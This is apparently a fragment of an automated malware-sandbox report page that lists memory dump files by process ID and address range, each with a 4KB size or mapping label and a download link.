memory/4392-128-0x0000000004650000-0x0000000004651000-memory.dmp

Filesize
4KB

Download
memory/4392-123-0x0000000007150000-0x0000000007151000-memory.dmp

Filesize
4KB

Download
memory/4392-119-0x0000000000000000-mapping.dmp

Download
memory/4392-122-0x00000000046A0000-0x00000000046A1000-memory.dmp

Filesize
4KB

Download
memory/4392-138-0x0000000008E80000-0x0000000008E81000-memory.dmp

Filesize
4KB

Download
memory/4392-124-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

Filesize
4KB

Download
memory/4392-137-0x00000000098F0000-0x00000000098F1000-memory.dmp

Filesize
4KB

Download
memory/4392-125-0x00000000077F0000-0x00000000077F1000-memory.dmp

Filesize
4KB

Download
memory/4392-126-0x0000000007940000-0x0000000007941000-memory.dmp

Filesize
4KB

Download
memory/4392-148-0x0000000004653000-0x0000000004654000-memory.dmp

Filesize
4KB

Download
memory/4392-127-0x0000000007AB0000-0x0000000007AB1000-memory.dmp

Filesize
4KB

Download
memory/4392-129-0x0000000004652000-0x0000000004653000-memory.dmp

Filesize
4KB

Download
memory/4392-132-0x00000000081A0000-0x00000000081A1000-memory.dmp

Filesize
4KB

Download
memory/4392-131-0x0000000008080000-0x0000000008081000-memory.dmp

Filesize
4KB

Download
memory/4392-130-0x0000000007920000-0x0000000007921000-memory.dmp

Filesize
4KB

Download
memory/4416-167-0x0000000000000000-mapping.dmp

Download
memory/4424-160-0x0000000000000000-mapping.dmp

Download
memory/4584-141-0x0000000000000000-mapping.dmp

Download
memory/4588-170-0x0000000000000000-mapping.dmp

Download
memory/4592-168-0x0000000000000000-mapping.dmp

Download
memory/4596-142-0x0000000000000000-mapping.dmp

Download
memory/4616-171-0x0000000000000000-mapping.dmp

Download
memory/4684-143-0x0000000000000000-mapping.dmp

Download
memory/4704-144-0x0000000000000000-mapping.dmp

Download
memory/4760-146-0x0000000000000000-mapping.dmp

Download
memory/4812-147-0x0000000000000000-mapping.dmp

Download
memory/4828-169-0x0000000000000000-mapping.dmp

Download
memory/4868-149-0x0000000000000000-mapping.dmp

Download
memory/4948-150-0x0000000000000000-mapping.dmp

Download
memory/5012-153-0x0000000000000000-mapping.dmp

Download
memory/5020-154-0x0000000000000000-mapping.dmp

Download
memory/5060-155-0x0000000000000000-mapping.dmp

Download
memory/5084-156-0x0000000000000000-mapping.dmp

Download